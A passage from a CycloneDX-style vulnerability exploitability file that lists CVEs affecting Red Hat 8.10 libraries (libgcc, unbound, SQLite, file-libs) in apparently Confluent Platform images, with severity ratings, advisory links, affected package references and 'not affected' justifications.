          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2019-16866",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        755,
        908
      ],
      "description": "Unbound before 1.9.4 accesses uninitialized memory, which allows remote attackers to trigger a crash via a crafted NOTIFY query. The source IP address of the query must match an access-control rule.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-16866"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-16866"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/blob/release-1.9.4/doc/Changelog"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E65NCWZZB2D75ZIYWPXKMVGSGNYW4JMC/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MLRHE7TQFAOV4MB2ELTOGESZYUL65NUJ/"
        },
        {
          "url": "https://nlnetlabs.nl/downloads/unbound/CVE-2019-16866.txt"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16866"
        },
        {
          "url": "https://seclists.org/bugtraq/2019/Oct/23"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4149-1"
        },
        {
          "url": "https://usn.ubuntu.com/4149-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-16866"
        },
        {
          "url": "https://www.debian.org/security/2019/dsa-4544"
        }
      ],
      "published": "2019-10-03T19:15:09+00:00",
      "updated": "2026-06-17T02:22:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2019-19244",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "sqlite3Select in select.c in SQLite 3.30.1 allows a crash if a sub-select uses both DISTINCT and window functions, and also has certain ORDER BY usage.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-19244"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-19244"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
        },
        {
          "url": "https://github.com/sqlite/sqlite/commit/e59c562b3f6894f84c715772c4b116d7b5c01348"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19244"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4205-1"
        },
        {
          "url": "https://usn.ubuntu.com/4205-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-19244"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
        }
      ],
      "published": "2019-11-25T20:15:11+00:00",
      "updated": "2026-06-17T02:26:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2019-8905",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.6,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "do_core_note in readelf.c in libmagic.a in file 5.35 has a stack-based buffer over-read, related to file_printable, a different vulnerability than CVE-2018-10360.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-8905"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00027.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00053.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/107137"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-8905"
        },
        {
          "url": "https://bugs.astron.com/view.php?id=63"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00044.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8905"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-3911-1"
        },
        {
          "url": "https://usn.ubuntu.com/3911-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-8905"
        }
      ],
      "published": "2019-02-18T17:29:00+00:00",
      "updated": "2026-06-17T02:42:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "5.33-27.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
